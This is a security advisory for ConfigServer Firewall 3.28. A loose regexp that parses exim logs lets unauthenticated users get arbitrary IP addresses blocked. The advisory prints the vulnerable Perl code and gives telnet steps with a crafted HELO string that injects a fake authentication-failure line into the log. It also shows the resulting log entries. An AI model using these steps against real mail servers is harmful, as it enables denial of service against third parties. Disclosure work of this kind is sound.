CSF 3.28 - remotely block any IP address (smtpauth regexp)



DESCRIPTION


ConfigServer Firewall 3.28 provides the option to block smtp auth based brute force login attempts from /var/log/exim_mainlog. A regexp from csf/regexp.pm allowed any remote, unauthenticated person to block any IP address of their choice. The code looked similar to the following:

 161     if ( $log_line =~ /fixed_login.*\[(\d+\.\d+\.\d+\.\d+)]: 535 Incorrect authentication data/ ) {
 162         return ( 'Unsuccessful SMTP AUTH login from', $1, 'smtpauth' );
 163     }



IMPACT


Remote, unauthenticated persons could block any IP address of their choice.


The following steps can be used to take advantage of this issue:


1. telnet $victim_mailserver 25

2. issue the following 2 commands:

helo fixed_login [1.2.3.4]: 535 Incorrect authentication data
mail from:<>

3. issue the following command 5 times:

rcpt to:<user@example.com>



This is what a normal smtp authentication failure from exim_mainlog looks like:

2009-09-08 17:16:37 H=host.example.com [1.1.1.1] F=<> rejected RCPT <user@example.com>: host.example.com [1.1.1.1]
is currently not permitted to relay through this server. Perhaps you have not logged into the pop/imap server in the last
30 minutes or do not have SMTP Authentication turned on in your email client.


and this is what the log will look like each time you issue the command from step 3 shown above:

2009-09-08 17:09:26 H=host.example.com (fixed_login [1.2.3.4]: 535 Incorrect authentication data) [1.1.1.1]
F=<> rejected RCPT <user@example.com>: host.example.com (fixed_login [1.2.3.4]: 535 Incorrect authentication data)
[1.1.1.1] is currently not permitted to relay through this server. Perhaps you have not logged into the pop/imap
server in the last 30 minutes or do not have SMTP Authentication turned on in your email client.


The bolded text is what has been remotely injected into the log.